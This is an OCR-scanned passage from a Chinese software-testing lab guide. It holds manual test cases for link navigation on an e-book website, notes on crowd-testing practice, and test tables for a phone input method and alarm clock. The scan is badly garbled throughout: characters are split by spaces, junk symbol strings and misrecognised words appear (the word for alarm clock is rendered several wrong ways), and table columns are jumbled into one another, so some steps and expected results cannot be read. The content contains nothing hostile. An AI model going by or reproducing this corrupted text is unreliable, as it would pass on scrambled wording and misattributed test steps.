作品 封面 “分 享 作 展 示 网 http://books. roqisoft. com 
到 ”插件 一 搜索 框 |(2) 单 击 任 一 作品 ,进入 作品 首页 
中 输入 存在 网 址 |(3) 鼠标 县 停 在 页 面 右边 的 “分 享 到 " 按 dt i 
的 首 字母 或 关 钮 , 单 击 “ 查 看 更 多 ”按钮 
键 字 (4) 在 搜索 框 中 输入 存在 网 址 的 首 字 母 
或 关键 字 , 如 BD 
a) 用 浏览 器 打开 言 若 金 叶 精品 软件 著 O 链接 到 和 步骤 (2) 所 单 击 
作品 封面 一 导航 作 展 示 网 http: / /books. roqisoft. com 的 作品 对 应 的 “前 言 "页 面 
“前 言 链 接 是 否 | (2) 单 击 任 一 作品 ,进入 作品 首页 D 响应 页 面 上 的 元 素 正确 并 
有 效 (3) 单 击 导航 条 中 的 “前 言 "链接 且 排 版 规范 
(4) 检查 响应 的 页 面 
O 用 浏览 器 打开 言 若 金 叶 精 品 软 件 堵 |(1) 链接 到 和 步骤 (2) 所 单 击 
作品 封面 一 导航 作 展 示 网 http : / /books. roqisoft. com 的 作品 对 应 的 “封底 "页 面 
“封底 ”链接 是 否 |(2) 单 击 任 一 作品 ,进入 作品 首页 (D 响应 页 面 上 的 元 素 正 确 并 
有 效 (3) 单 击 导航 条 中 的 “封底 ”链接 且 排 版 规范 
(4) 检查 响应 的 页 面 
(1) 用 浏览 器 打开 言 车 金 叶 精品 软件 著 |(1) 链接 到 和 步骤 (2) 所 单 击 
作品 封面 一 导航 作 展 示 网 http://books. roqisoft. com 的 作品 对 应 的 “出 版 原因 ” 
“出 版 原因 ”链接 |(2) 单 击 任 一 作品 ,进入 作品 首页 页 面 
是 否 有 效 G) 单 击 导航 条 中 的 “出 版 原因 ”链接 (2) 响应 页 面 上 的 元 素 正确 并 
(4) 检查 响应 的 页 面 且 排 版 规范 
CD 用 浏览 器 打开 言 车 金 叶 精品 软件 著 | (1) 链接 到 和 步骤 (2) 所 单 击 
作品 封面 一 导航 作 展 示 网 http://books. rogisoft. com 的 作品 对 应 的 “目录 结构 ” 
“目录 结构 ”链接 |(2) 单 击 任 一 作品 ,进入 作品 首页 页 面 
是 否 有 效 (3) 单 击 导航 条 中 的 “目录 结构 ”链接 (2) 响应 页 面 上 的 元 素 正 确 并 





(4) 检查 响应 的 页 面 





且 排 版 规范 
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续 表 
" 实际 测试 
测试 用 例 标 题 操作 步骤 期 望 结果 (Pass/Fail) 
(1) 用 浏览 器 打开 言 若 金 叶 精品 软件 著 | (1) 链接 到 和 步骤 (2) 所 单 击 
作品 封面 一 导航 作 展 示 网 http : / /books. roqisoft com 的 作品 对 应 的 “读者 推荐 ” 
“读者 推荐 ”链接 |(2) 单 击 任 一 作品 ,进入 作品 首页 页 面 
是 否 有 效 (3) 单 击 导航 条 中 的 “读者 推荐 "链接 (2) 响应 页 面 上 的 元 素 正确 并 
(4) 检查 响应 的 页 面 且 排 版 规范 
(1) 用 浏览 器 打开 言 若 金 叶 精品 软件 著 | (1) 链接 到 和 步骤 (2) 所 单 击 
作品 封面 一 导航 作 展 示 网 http://books. roqisoft. com 的 作品 对 应 的 “获奖 名 单 ” 
“获奖 名 单 ” 链 接 |(2) 单 击 任 一 作品 ,进入 作品 首页 页 面 
是 否 有 效 (3) 单 击 导航 条 中 的 “获奖 名 单 " 链 接 (2) 响应 页 面 上 的 元 素 正确 并 
(4) 检查 响应 的 页 面 且 排 版 规范 
(1) 用 浏览 器 打开 言 若 金 叶 精品 软件 著 | (1) 链接 到 和 步骤 (2) 所 单 击 
作品 封面 一 导航 作 展 示 网 http://books. roqisoft. com 的 作品 对 应 的 “网 上 购买 ” 
“网 上 购买 "链接 | (2) 单 击 任 一 作品 ,进入 作品 首页 页 面 
是 否 有 效 (3) 单 击 导航 条 中 的 “网 上 购买 "链接 (2) 响应 页 面 上 的 元 素 正确 并 
(4) 检查 响应 的 页 面 且 排 版 规范 
“网 上 购买 ”页 面 链接 到 步骤 (2) 所 单 击 的 购买 
中 任 一 购买 网 址 (2) 单 击 任 一 作品 ,进入 作品 首页 网 址 的 页 面 
的 链接 (3) 单 击 导航 条 中 的 “网 上 购买 "按钮 
(4) 单 击 任 一 购买 网 址 
(1) 用 浏览 器 打开 言 若 金 叶 精 品 软件 著 | (1) 链接 到 和 步骤 (2) 所 单 击 
作品 封面 一 导航 作 展 示 网 http: //books. rogisoft. com 的 作品 对 应 的 “联系 我 们 ” 
“联系 我 们 ”链接 | (2) 单 击 任 一 作品 ,进入 作品 首页 页 面 
是 否 有 效 (3) 单 击 导航 条 中 的 “联系 我 们 ”链接 (2) 响应 页 面 上 的 元 素 正 确 并 
(4) 检查 响应 的 页 面 且 排 版 规范 
我 们 ”页 面 中 任 一 链接 到 步骤 (4) 所 单 击 的 联系 
联系 网 址 的 链接 (2) 单 击 任 一 作品 ,进入 作品 首页 网 址 页 面 
是 否 有 效 (3) 单 击 导航 条 中 的 “联系 我 们 ”按钮 
(4) 单 击 任 一 联系 网 址 
(HUE | goose com 
我 们 ”页 面 中 任 一 e e 链接 到 步骤 (4) 所 单 击 的 附件 
附件 网 址 的 链接 (2) 单 击 任 一 作品 ,进入 作品 首页 网 址 页 面 
是 否 有 效 (3) 单 击 导航 条 中 的 “联系 我 们 ”按钮 
(4) 单 击 任 一 附件 网 址 
CD 用 浏览 器 打开 言 若 金 叶 精 品 软件 著 
es 作 展 示 网 http: //books roqisoft com | 链接 到 言 若 金 叶 精品 软件 著作 
是 否 有 效 (2) 单 击 任 一 作品 ,进入 作品 首页 展示 网 首页 





(3) 单 击 导航 条 中 的 “相关 书籍 ?链接 











实验 10 ”设计 电子 书籍 类 测试 用 例 


M. 专家 点 评 


对 于 这 样 的 测试 用 例 ,一 般 使 用 系统 的 用 户 也 可 以 参与 执行 。 在 设计 和 编写 测试 用 例 
时 需要 注意 ,描述 步骤 要 清晰 明了 并 且 简 单 ,让 人 一 看 就 知道 如 何 操作 ,期 望 结果 要 详细 准 
确 , 使 写 出 来 的 测试 用 例 可 以 直接 拿 给 完全 不 熟悉 系统 的 人 员 或 者 公司 新 员工 执行 。 

+ 10-1 是 针对 书籍 网 站 编写 的 测试 用 例 。 这 种 测试 用 例 格 式 是 在 参与 国际 测试 项 目 
时 经 常 遇 到 的 。 遇 到 这 样 的 项 目 ,完成 步骤 一 般 如 下 。 

(1) 按 要 求 申 请 (Claim) 一 个 测试 用 例 , 有 的 项 目 可 以 在 不 同 测试 环境 申请 多 个 。 

(2) 阅读 理解 项 目 介绍 。 

(3) 到 申请 的 测试 用 例 中 下 载 用 例文 件 , 一 般 都 是 Excel 文件 。 

(4) 打开 文件 ,一 般 格 式 和 上 述 案 例 格 式 类 似 , 大 致 浏览 一 遍 所 有 测试 用 例 。 

(5) 按照 测试 用 例 要 求 执行 测试 用 例 。 

(6) 标记 测试 结果 ,Pass 为 实际 结果 和 期 望 结果 一 样 ,测试 用 例 通过 ; Fail 为 实际 结果 
和 期 望 结果 不 一 致 ,测试 用 例 执 行 失败 。 

(7) 对 于 Fail 的 测试 用 例 , 需 要 提交 一 个 Bug, 并 且 将 Bug ID 标记 在 Fail 的 测试 用 
例 中 。 


W 拓展 训练 


对 言 若 金 叶 电子 书籍 网 站 http://books. rogisoft. com 进行 更 深入 的 测试 用 例 设计 。 
提醒 : 可 以 在 http://collegecontest. roqisoft. com/awardshow. html 中 查阅 历年 全 国 
高 校 大 学 生 在 这 些 网 站 中 发 现 的 更 多 测试 用 例 设计 。 
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N 
读书 笔记 
ae 


读书 笔记 Name: Date: 








励志 名 名 : I might say that success is won by three things: first, ef forts 


second, more ef fort s third, still more ef fort. 





成 功 之 道 唯 三 点 : 努力 ,努力 、 再 努力 。 















































dj «8; ^d; e@; a4; uq; ed; eq; ^4; vq; ^4; eÓ; ^4; en; 





设计 手机 应 用 类 测试 用 例 | 


^&5Hfü ) 


手机 应 用 变 得 越 来 越 流行 ,主要 原因 有 碎片 时 间 利 用 、 处 理 紧 
急 和 临时 事件 等 。 本 实验 选取 了 手机 应 用 中 两 个 最 常用 的 功能 : 
手机 输入 法 、 手 机 闹钟 的 展示 ,方便 读者 去 思考 如 何 设 计较 好 的 测 
试用 例 。 

通过 本 实验 的 学 习 , 软 件 测试 工程 师 能 自己 设计 相对 完备 的 手机 
应 用 类 测试 用 例 ,方便 自己 或 他 人 执行 这 些 测试 用 例 , 通 过 经 典 测试 
用 例 的 设计 展示 ,每 位 读者 都 能 体会 设计 思路 。 


11.1 手机 应 用 Mobile 项 目 总 述 


手机 应 用 变 得 越 来 越 流行 。 在 国际 消费 电子 产品 展览 会 上 ， 
微 博 网 Twitter 的 首席 执行 官 迪克 。 科 斯 特 洛 (Dick Costolo) 称 ， 
约 有 40% 的 推 文 (tweet) 来 自 移动 设备 。 这 证 明 移 动 设备 对 于 社 
交 媒 体 公司 越 来 越 重要 了 。 在 展览 会 期 间 , 科 斯 特 洛 接受 了 美国 
科技 博客 AllThingsD 的 采访 。 在 访谈 中 ,他 谈 到 了 Twitter 出 席 
国际 消费 电子 产品 展览 会 的 原因 以 及 Twitter 网 站 名 人 用 户 的 影 
响 力 等 。 

在 访谈 中 , 当 科 斯 特 洛 被 问 及 哪些 设备 和 操作 系统 对 Twitter 网 
站 的 未 来 发 展 至 关 重 要 时 ,他 回答 说 ,现在 Twitter 网 站 上 40% 的 推 
文 均 产 生 于 移动 设备 上 ,而 在 一 年 前 ,这 个 数字 仅 为 25%。 

随 着 Twitter 网 站 正式 推出 iPhone, iPad, Android 和 黑莓 应 用 程 
JY ,访问 Twitter 网 站 的 移动 用 户 数量 急剧 增加 。 在 这 些 应 用 程序 
中 ,SMS iPhone 版 Twitter 和 黑莓 版 Twitter 最 受用 户 欢 迎 。 

手机 应 用 之 所 以 越 来 越 普 及 并 且 越 来 越 重要 ,主要 原因 如 下 。 

1. 碎片 时 间 利 用 

现在 各 大 主流 微 博 、 网 络 在 线 应 用 都 开始 推出 独立 的 手机 客户 端 
应 用 ,以 保持 其 高 访问 量 和 留 住 用 户 及 培养 未 来 用 户 的 习惯 。 现 在 人 
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们 开始 利用 移动 设备 来 消磨 自己 的 零碎 时 间 : 在 公交 、 地 铁 上 ,等 待 快餐 ,提前 到 达 预 约 地 
点 ,等 待 会 议 人 员 进 场 ,飞机 晚点 ,会 议 过 程 短暂 休息 …… 

很 多 人 觉得 碎片 时 间 不 起 眼 ,但 积 少 成 多 ,从 Twitter 40% 的 推 文 就 可 以 看 出 碎片 时 间 
相对 于 主流 来 说 已 经 是 旗 鼓 相当 了 ,而 且 未 来 人 们 的 交叉 更 多 ,能 够 空闲 的 时 间 都 是 “碎片 
化 的 ”。 

2. 处 理 紧急 和 临时 事件 

例如 ,你 在 购物 时 突然 希望 能 够 获得 准确 的 网 络 报价 ,以 确定 是 否 在 现场 购买 某 件 物 
体 , 这 时 你 可 以 拿 出 移动 设备 进行 网 络 查询 。 

又 如 ,你 在 一 个 城市 预订 了 酒店 ,而 在 去 往 该 地 过 程 中 改变 行程 或 者 取消 计划 ,你 可 以 
方便 地 通过 手机 更 改 酒 店 预订 或 者 取消 预订 。 

当然 ,还 有 更 多 原因 ,在 此 不 再 袭 述 。 


11.2. 手机 应 用 测试 用 例 设 计 思 路 


手机 应 用 越 来 越 普遍 ,智能 手机 能 实现 的 功能 实在 太 多 ,手机 不 只 是 人 与 人 联系 沟通 的 

必需 品 ,更 是 生活 的 必需 品 。 但 不 管 是 什么 手机 ,最 主要 也 最 常用 的 两 个 功能 一 定 是 手机 输 
入 法 和 手机 闹钟 ,平常 用 手机 输入 法 和 和 手机 设置 闹钟 的 频率 比 打 电 话 还 高 。 本 实验 主要 介 
绍 手机 输入 法 和 手机 亲 钟 设置 的 测试 用 例 设计 思路 ,还 有 更 多 手机 应 用 的 功能 可 以 作为 练 
习 去 发 现 ,去 实验 。 


11.3 手机 输入 法 测试 用 例 设 计 


在 针对 中 国 市 场 研发 的 手机 上 ,都 有 汉字 输入 法 ,便于 写 短信 、 写 便签 等 。 手 机 输入 法 
测试 用 例如 表 11-1 所 示 。 





表 11-1 手机 输入 法 测试 用 例 





























测试 选项 操作 方法 观察 与 判断 结果 
输入 法 测试 核对 中 文字 库 | 依据 中 文字 库 , 逐 行 输入 核对 , 检查 有 无 缺 字 、 错 字 、 候 
(GB 2312) 选 字 重复 等 现象 
(1) 在 文本 输入 界面 选择 笔画 输入 法 输入 汉字 
(2) 输入 一 个 汉字 的 一 笔 后 进行 翻 页 查找 
文本 输入 (3) ue c NE 应 出 现在 候选 字 
笔画 输入 法 
(4) 选择 该 字 , 并 确认 ; 该 字 出 现在 文本 编辑 框 中 
(5) 连续 输入 汉字 
(1) 在 笔画 输入 界面 ,对 未 定义 笔画 的 按键 进行 测试 
按键 测试 
(2) 逐一 按 住 无 效 键 
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续 表 
测试 选项 操作 方法 观察 与 判断 结果 








COD 在 文本 输入 界面 选择 拼音 输入 法 输入 汉字 

(2) 输入 一 个 汉字 的 一 个 拼音 字母 后 进行 翻 页 查找 

AERA (3) rr Css nsn 

拼音 输入 法 (OD 选择 该 字 , 并 确认 ,该 字 出 现在 文本 编辑 框 中 

(5) 连续 输入 汉字 

(1) 在 拼音 输入 界面 ,对 未 定义 拼音 字母 的 按键 进行 

按键 测试 测试 

(2) 逐一 按 住 无 效 键 

(1) 在 文本 输入 界面 选择 英文 输入 法 输入 英文 

(2) 输入 一 个 单词 的 第 一 个 字母 

文本 输入 (3) 顺序 输入 该 单词 的 字母 

英文 输入 法 (4) 输入 专用 词 , 如 大 写 的 、 省 略 的 等 

(5) 连续 输入 单词 

(1) 在 英文 输入 界面 ,对 未 定义 字母 的 按键 进行 测试 

(2) 逐一 按 住 无 效 键 

(1) 在 文本 输入 界面 选择 数字 输入 法 

输入 数字 (2) 输入 数字 0~9 

(3) 重复 .大量 地 输入 数字 

(1) 快捷 输入 常用 的 标点 符号 ; 常用 的 标点 符号 通常 定 
义 为 按 住 * 、# 键 等 即 可 输入 

(2) 选择 标点 符号 输入 法 进行 输入 

(3) 分 别 在 中 文 ,英文 界面 输入 标点 符号 

(1) 在 中 文 输入 法 界面 , 按 输 入 法 切换 键 将 输入 法 切换 
成 英文 输入 法 输入 英文 

(2) 在 中 文 输入 法 界面 , 按 输入 法 切换 键 将 输入 法 切换 

快速 切换 输 成 标点 符号 输入 法 进行 标点 符号 输入 

输入 法 切换 Ax (3) 在 英文 输入 法 界面 , 按 输入 法 切换 键 将 输入 法 切换 

成 中 文 输入 法 输入 中 文 

(4) 在 英文 输入 法 界面 , 按 输入 法 切换 键 将 输入 法 切换 
成 标点 符号 输入 法 进行 标点 符号 输入 

(5) 在 各 种 输入 法 之 间 进 行 快速 切换 









































按键 测试 











数字 、 标 点 符号 、 
特殊 字符 输入 





输入 标点 符号 



































x5 专家 点 评 


手机 输入 法 也 是 国际 软件 测试 中 经 常 遇 到 的 测试 。 在 国际 软件 测试 市 场 ,针对 手机 的 
测试 目前 主要 分 为 三 类 。 

CD 手机 自身 的 测试 (这 种 对 方 一 般 会 提供 手机 样机 供 测试 人 员 进 行 测试 ) ,主要 是 针 
对 手机 硬件 和 出 厂 时 预 装 软件 的 测试 。 

(2) 手机 应 用 软件 APP 的 测试 ,需要 在 测试 者 的 手机 上 下 载 安装 一 个 应 用 软件 ,然后 
对 软件 进行 测试 。 





214 


x 


软件 测试 实验 实 训 指南 


(3) 在 手机 上 直接 测试 网 站 应 用 ,这 种 和 在 计算 机 中 测试 网 站 一 样 ,只 不 过 是 用 手机 浏 
览 器 访问 网 站 ,查看 手机 是 否 显 示 正 常 , 功 能 是 否 正常 。 
我 们 在 测试 过 程 中 发 现 外 国人 做 汉字 输入 法 ,经 常会 出 现 缺 字 、 错 字 、 候 选 字 重 复 等 现 
象 ; 特别 是 一 些 国定 的 词组 ,在 外 国人 设计 的 拼音 和 输入 法 中 ,经 常 缺失 ,从 而 产生 了 许 


多 Bug。 


当然 ,我 们 在 设计 测试 用 例 时 ,要 考虑 周全 ,不 仅仅 考虑 到 输入 法 自身 的 测试 ,包括 字 
库 、 词 组 等 正常 测试 ,还 要 有 不 同 汉 字 输 入 法 切换 的 测试 ,特殊 字符 的 测试 .中 英文 切换 的 测 


11.4 手机 阅 钟 设置 测试 用 例 设 计 


闹钟 是 大 多 数 人 生活 中 必 备 的 东西 ,有 了 它 , 早 上 就 不 怕 上 班 迟到 ,也 能 安心 睡 个 好 觉 。 
现在 智能 手机 的 闹钟 程序 已 经 越 来 越 复 杂 , 也 更 具有 包装 特色 ,而 且 越 来 越 多 的 人 开始 抛弃 
旧式 传统 闹钟 ,使 用 手机 闹钟 APP. 

和 传统 闹钟 相 比 ,手机 闹钟 时 间 更 加 精准 ,因为 它 可 以 随时 获取 网 络 时 间 ; 手机 闹钟 扒 
带 更 加 方便 ,现在 智能 手机 是 人 们 不 离 手 的 东西 ,出 差 、 旅 游 也 不 必 专 门 为 了 早起 而 带 上 传 
统 闹 钟 ; 手机 闹钟 比 传统 闹钟 的 功能 更 丰富 ,可 以 设置 铃声 、 提 醒 间 隔 、 亲 铃 音量 等 。 

当今 ,智能 手机 的 各 种 系统 都 支持 手机 闹钟 APP ,很 多 系统 已 经 自 带 了 手机 闹钟 , 需 对 





其 进行 有 效 的 测试 。 手 机 闹钟 测试 用 例如 表 11-2 所 示 。 
表 11-2 手机 闲 钟 测试 用 例 
测试 用 例 标题 前 提 条 件 TEL 期 望 结果 
CD 手机 不 于 开机 状态 
ka Le CPU. lo» 手机 能 正常 运行 等 和 时间 到 达 17 :00 — [an sno n 


(3) 设置 闹 铃 时 间 为 17 + 00 





闹 铃 响起 一 关机 
状态 


CD 手机 处 于 关机 状态 
(2) 手机 能 正常 运行 
(3) 设置 闹 铃 时 间 为 17 + 00 


等 待 时 间 到 达 17 : 00 


主 界面 显示 闹钟 界面 , 闹 铃 
响起 





闹 铃 响起 一 关闭 
We 


COD 手机 处 于 开机 状态 
(2 手机 能 正常 运行 
(3) 设置 闹 铃 时 间 为 17 : 00 


(1) 等 待 时 间 到 达 17 : 00 
(2) 关闭 闹 铃 


(1) 主 界面 显示 闹钟 界面 ， 
i] £e nq o 

(2) 关闭 闹 铃 后 ,铃声 暂停 ， 
关闭 闹钟 界面 ,返回 手 
机 主 界面 





闹 铃 响起 一 重复 
Wt CREBRO 


COD 手机 处 于 开机 状态 
(2 手机 能 正常 运行 
(3) 设置 闹 铃 时 间 为 17 : 00 


(1) 等 待 时 间 到 达 17 : 00 
(2) 不 做 任何 操作 


(1) 主 界面 显示 闹钟 界面 ， 
闹 铃 响起 

(2) 闹 铃 会 根据 闹钟 设置 重 
复 响起 





设置 闹钟 一 设置 
时 间 





COD 手机 处 于 开机 状态 
(2) 手机 能 正常 运行 





CD 新 增 闹钟 ,时 间 设 置 为 
17:00 

(2) 其 他 均 为 默认 设置 

(3) 等 待 时 间 到 达 17 : 00 





主 界面 显示 闹钟 界面 , 闹 铃 
响起 
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续 表 
测试 用 例 标题 前 提 条 件 Bb m 期 望 结果 
CD 新 增 阅 钟 ,时 间 设置 为 
17:00 
设置 闹钟 一 设置 |(1) 手机 处 于 开机 状态 — | (2) 重复 日 为 每 天 主 界面 显示 阅 钟 界面 , 闹 铃 
重复 日 (2) 手机 能 正常 运行 (© 其 他 均 为 默认 设置 | 响起 
(4) 等 待 每 天 的 时 间 到 达 
17:00 
CD 新 增 闹钟 ,时 间 设置 为 
17:00 ES 
设置 闹钟 一 设置 |(1) 手机 处 于 开机 状态 |D 设置 铃声 为 SD 卡 中 的 “ea atakan aku 
自 定义 铃声 (2) 手机 能 正常 运行 某 MP3 文件 Rý 
(3) 其 他 均 为 默认 设置 
(4) 等 待 时 间 到 达 17 : 00 
CO 设置 音量 为 最 大 ,等 待 
时 间 到 达 17 : 00 | 主 界面 显示 闭 钟 界面 , 闹 铃 响 
1 -> 太 
a mu S 了 (2) 设置 音量 为 总 音量 的 | 起 ,可 清晰 辨识 闹 铃 铃声 的 音 
一 半 , 等 待 时 间 到 达 | 量 大 小 根据 设置 成 正比 关系 
17:02 
主 界面 显示 阅 钟 界面 , 闸 伶 响 
umm gu O 手机 处 于 开机 状态 。 | 设置 周 钟 响 维 方式 为 振动 ,| 起 , 闸 铃 响起 的 时 候 ,手机 是 
(2) 手机 能 正常 运行 。 | 等 待 时 间 到 达 17:00 “| 振动 还 是 播放 闹 铃 音乐 与 六 
钟 设置 有 关 
设置 六 钟 一 闹钟 (1) 手机 处 于 开机 状态 | 设置 提示 语 为" 起 床 啦 ”, 等 | 主 界面 显示 阅 钟 界面 , 闸 伶 响 
提示 语 (2) 手机 能 正常 运行 。 | 待 时 间 到 达 17 : 00 d. SUR ERR" 
设置 闹钟 取消 |G1) 手机 处 于 开机 状态 “| 在 闹钟 设置 界面 ,点 击 “ 取 pe ee 
DE (2) 手机 能 正常 运行 消 ”按钮 PR Ë 
设置 闹钟 “完成 | (1) 手机 处 于 开机 状态 — | 在 闹钟 设置 界面 ,点 击 “ 完 人 
DL (2) 手机 能 正常 运行 成 "按钮 és 
(D 手机 处 于 开机 状态 O 开启 静音 响起 ,等 待 时 | G) 到 17 :00, 主 界面 显示 六 
闹钟 通用 设置 一 |(2) 手机 能 正常 运行 间 到 达 17 : 00 LES MOLISE 
静音 响起 O 手机 处 于 静音 /普通 | (2) 取消 静音 响起 ,等 待 时 | (2) 到 17 : 02, 界 面 没有 任何 
模式 间 到 达 17 : 02 变化 
责 钟 通用 设置 一 | (1) 手机 处 于 开机 状态 a, wasa 主 界面 显示 闹钟 界面 , 闹 铃 响 
自动 停止 六 钟 |o 手机 能 正常 运行 。 | 等待 时 间 到 达 17 :00 | 起 ,lmin 之 后 自动 停止 
主 界面 显示 曾 钟 界面 , 闸 铃 响 
闹钟 通用 设置 一 |(1) 手机 处 于 开机 状态 。 | 设置 间隔 时 间 为 3min, 等 | 起 ,lmin 之 后 自动 停止 ,间隔 
青 响 间隔 时 间 。 | (2) 手机 能 正常 运行 。 | 待 时 间 到 达 17 : 00 3min 再 次 响起 ,如 此 重复 3 











次 ,最 终 停止 
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续 表 
测试 用 例 标题 前 提 条 件 操作 步骤 期 望 结果 
(1) 17 : 00 主 界面 显示 闹钟 
CD 按键 设 定 为 无 ,等 待 时 | 。 界面 , 闸 铃 响起 , 按 下 音 
间 到 达 17 : 00 量 键 之 后 界面 不 变 
(2) 按键 设 定 为 关闭 ,等 待 | (2) 17 : 01 主 界面 显示 闹钟 
闻 钟 通用 设置 一 |(1) 手机 处 于 开机 状态 时 间 到 达 17 : 01 界面 , 闸 铃 响起 , 按 下 音 
音量 按钮 作用 (O 手机 能 正常 运行 |O 按键 设 定 为 稍 后 再 响 ,| 。 量 键 之 后 闹钟 关闭 
等 待 时 间 到 达 17 : 02 | (3) 17 : 02 主 界面 显示 闹钟 
(4) 每 次 闹钟 响起 之 后 , 按 | 。 界面 , 闹 铃 响起 , 按 下 音 
下 音量 键 量 键 之 后 阅 钟 关闭 ,3min 
后 闹 铃 再 次 响起 
CD Ë W m É m MX 
ul OO 手机 处 于 开机 状态 17 00, 开启 站 钟 ,等 01) 到 17 ,00 时 , 主 界面 显示 
闹钟 列表 设置 一 待 时 间 到 17 : 00 
Sra xm me D 手机 能 正常 运行 |) Dra apa 为 | MONTARA 
c» 设置 阅 锥 时间 为 00| E a, a| 到 17 +01, 没有 任何 变化 
待 时 间 到 17 : 01 
CD 手机 处 于 开机 状态 
(2) 手机 能 正常 运行 
š — i RT EJ 
E O 已 经 设置 一 个 闹钟 时 | 点 击 闹钟 中 的 条 目 LT kho 
间 为 17 : 00, 其 他 设置 
为 默认 的 闹钟 
CD 手机 处 于 开机 状态 
闻名 列表 设置 一 | mmm U AW ERROA E DULCE HR T RIRI BR 
删除 MELLE 的 闹钟 消 失 在 闹钟 列 表 
为 默认 的 闹钟 
E bisous 点 击 菜单 键 ,选择 删除 , 进 
闻名 列表 设置 一 | 已 及 和 同人 钟 时 | 和风 名 列表 选择 模式 ,点 击 | 返回 到 闻名 列表 界面, 全 部 亲 
批量 删除 钟 时 |。 渤 "按钮, 然后 点 击 * 删 | 钟 都 删除 了 ,闹钟 列 表 为 空 
间 为 17 :00, 其 他 设置 | s* 近 人 
为 默认 的 闹钟 i 
s o. CD 设置 开启 一 个 闹钟 时 | CO 开启 阅 钟 时 ,手机 的 通知 
Weng er E i| 。 间 为 17 + 00, 其 他 设置 | 。 栏 亲 名 的 图 村 
手机 通知 栏 个 同名 时 间 为 7:00， | 。 为 默认 的 闻名 (2) 关闭 闹钟 时 ,手机 的 通知 
. E A ex 
amaya nmay D 设置 关闭 所 有 闻名 栏 不 会 出 现 闹钟 图 标 
CD 手机 处 于 开机 状态 
CD 手机 能 正常 运行 。 | 设置 20 个 闹钟 的 时 间 为 A 
压力 测试 一 多 个 à I 4 为 | 主 界面 显示 闹钟 界面 , 闹 锥 
Geass | 已 经 设置 20 4- REPRE L7 + 00, 其 他 设置 为 默认 的 | 在 





间 为 17 : 00, 其 他 设置 
为 默认 的 闹钟 





闹钟 ,等 待 17 : 00 到 达 
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续 表 
测试 用 例 标题 前 提 条 件 操作 步骤 期 望 结果 
said CD 设置 一 个 闹钟 时 间 为 
awu aqa o 全 生生 名 时 | 17 00, 其 他 设置 为 上 | ORIS REGE RE 
iig mre agm Sm" 起 。 关闭 闹钟 之 后 ,自动 跳 转 
(2) 一 直 编 写 短信 , 等 待 | 回 短信 编辑 界面 
为 默认 的 曾 钟 17 : 00 到 达 
(4) 正在 编辑 短信 
CD 手机 处 于 开机 状态 — [QD 设置 一 个 闹钟 时 间 为 _ 
arano x D 手机 能 正常 运行 17:003 RS | Ru ON 
(3) 已 经 设置 一 个 闹钟 时 | AE, SÉ 17 00 E 
短信 (2) 短信 在 通知 栏 提示 ,手机 
间 为 17 : 00, 其 他 设置 | 。 到 达 petii 
为 默认 的 闹钟 (2) 闹钟 响起 时 来 短信 
QD 手机 处 于 开机 状态 [CD 设置 一 个 闹钟 时 间 为 
pran-an D 手机 能 正常 运行 17: 00, 其 他 设置 为 默 | 主 界面 显示 闹钟 界面 , 闹 铃 响 
és (3) BRE mb AmS 起 。 关闭 闹钟 之 后 ,自动 跳 转 
5 间 为 17 : 00, 其 他 设置 | (2) 一 直 编辑 彩信 ,等 待 时 | 回 彩信 编辑 界面 
为 默认 的 闹钟 间 到 达 17 + 00 
CD 手机 处 于 开机 状态 D) 设置 一 个 闹钟 时 间 为 _ 
aaao g O 手机 能 正常 运行 17: ootama] O see ANAE, M 
(3) 已 经 设置 一 个 阅 钟 时 | 认 的 闹钟 ,等 待 17 : 00 RE. _ 
彩信 (2) 彩信 在 通知 栏 提示 ,手机 
间 为 17 : 00, 其 他 设置 | ”到 达 en 
为 默认 的 闹钟 (2) 闹钟 响起 时 来 彩信 
CD 手机 处 于 开机 状态 ， 
co 手机 能 正常 运行 | 7 S Ca Sua IURI, Rt 
冲突 测试 一 通 | 3) LLLI 起 ,通话 不 影响 ,但 是 会 有 通 
话 中 间 为 17 :00, 其 他 设置 | pa, app FSRR O i AA 
ELSE Too ” “| 钟 之 后 ,只 剩 下 通话 声音 
(4) 正在 通话 状态 
QD 手机 处 于 开机 状态 OD 设置 一 个 闹钟 时 间 为 | < zu com 
(2) 手机 能 正常 运行 17 : 00, 其 他 设置 为 默 — 
冲突 测试 一 来 电 |(3) 已 经 设置 一 个 闹钟 时 | 。 认 的 六 钟 ,到 达 17 + 00| 2) 来 电 之 后 ,显示 电话 接听 
界面, 接听 后 ,闹钟 铃声 和 
间 为 17 : 00, 其 他 设置 | (2) 在 17 : 00 闹钟 响起 时 KP 
sie ain ba 通话 声 混 响 。 直 到 关闭 六 
钟 才 恢复 正常 通话 
a eese CD 设置 一 个 闹钟 时 间 为 
冲突 测试 ~ 浏览 |(3) 已 经 设置 一 个 闹钟 时 riesen 
网 页 中 间 为 17 : 00, 其 他 设置 p 





为 默认 的 闹钟 
(4) 正在 浏览 网 页 





Go 一 直 浏 览 网 页 ,等 待 
17 : 00 到 达 





回 浏览 器 界面 
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续 表 





测试 用 例 标 题 


LEX IO 


操作 步骤 


期 望 结果 





冲突 测试 一 插 人 
耳机 


(1) 手机 处 于 开机 状态 

(2) 手机 能 正常 运行 

(3) 已 经 设置 一 个 闹钟 时 
间 为 17 : 00, 其 他 设置 
为 默认 的 闹钟 


CD 设置 一 个 闹钟 时 间 为 
17 : 00, 其 他 设置 为 默 
认 的 闹钟 ,等 待 17 : 00 
到 达 

(2) 闹钟 响起 时 插入 耳机 


CD. 主 界 面 显示 闹钟 界面 ,六 
铃 响 起 

(2) 手机 通知 栏 提示 插入 耳机 
图 标 

(3) 耳机 和 手机 的 扬声器 同时 
LES 





冲突 测试 一 拔 出 
耳机 





(1) 手机 处 于 开机 状态 

(2) 手机 能 正常 运行 

(3) 已 经 设置 一 个 闹钟 时 
间 为 17 : 00, 其 他 设置 
为 默认 的 闹钟 

(4) 插 着 耳机 


DO 专家 点 评 





COD 设置 一 个 闹钟 时 间 为 
17 : 00, 其 他 设置 为 默 
认 的 闹钟 ,等 待 17 : 00 
到 达 

(2) 闹钟 响起 时 拔 出 耳机 





D 主 界 面 显 示 闹 钟 界面 , 闹 
铃 响起 

(2) 手机 通知 栏 的 耳机 图 标 会 
消失 。 闹 钟 正常 通过 手机 
扬声器 响起 





手机 闹钟 的 测试 用 例 在 很 多 高 校 已 经 作为 经 典 案例 来 讲解 。 对 于 手机 闲 钟 的 测试 需要 
从 不 同 角度 、 不 同 场景 来 进行 。 现 在 , 随 着 移动 端的 广泛 使 用 ,对 于 手机 APP 的 测试 人 员 需 
求 量 越 来 越 大 。 在 测试 和 手机 闵 钟 类 似 的 手机 APP 时 ,需要 注意 的 问题 有 以 下 几 点 。 

